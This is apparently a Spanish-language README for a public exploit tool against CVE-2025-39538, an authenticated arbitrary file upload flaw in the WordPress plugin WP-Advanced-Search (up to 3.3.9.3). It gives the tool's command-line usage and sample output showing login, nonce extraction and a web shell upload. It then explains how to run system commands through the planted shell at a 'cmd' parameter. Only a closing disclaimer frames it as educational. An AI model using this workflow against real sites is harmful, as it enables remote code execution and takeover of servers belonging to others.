
WordPress WP-Advanced-Search <= 3.3.9.3 - Vulnerabilidad de subida de archivos arbitraria
CVE-2025-39538
Publicado: 2025-04-16
Tipo de Vulnerabilidad: Subida Arbitraria de Archivos (Subida sin Restricciones de Archivos con Tipo Peligroso)
Plugin Afectado: WP-Advanced-Search por Mathieu Chartier
Versiones Afectadas: Todas las versiones hasta la 3.3.9.3 inclusive
Esta vulnerabilidad permite a un atacante autenticado subir un archivo PHP malicioso (como un web shell) al servidor mediante la funcionalidad de importación proporcionada por el plugin. El archivo subido se coloca en el directorio de subidas de WordPress y podría provocar la ejecución remota de código.
🧱 Ruta de subida:
wp-content/uploads/2025/04/
Este script de Python realiza las siguientes acciones:
wp_advanced_search_up_nonce requerido de la página de administración de importación/exportación.usage: a.py [-h] -u URL -un USERNAME -p PASSWORD
CVE-2025-39538 - WP Advanced Search Arbitrary File Upload Exploit # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL (e.g., http://127.0.0.1/wordpress)
-un, --username USERNAME
WordPress Username
-p, --password PASSWORD
WordPress Password
[*] Attempting login...
[+] Logged in successfully.
[*] Fetching nonce from import/export page...
[+] Nonce extracted: 2140855687
[*] Attempting to upload shell...
[+] File uploaded (check wp-content/uploads or temp directory).
Después de la subida, puedes acceder a tu shell de esta manera:
http://target.site/wp-content/uploads/2025/04/nxploit.php?cmd=whoami
Reemplaza whoami con cualquier comando de Linux que quieras ejecutar, por ejemplo:
id — muestra el ID del usuario actual.pwd — muestra el directorio actual.ls — lista los archivos.Esta herramienta está destinada únicamente a pruebas de seguridad educativas y autorizadas.
El autor no es responsable de ningún uso indebido o daño causado por este script.
Por: Nxploited | Khaled Alenazi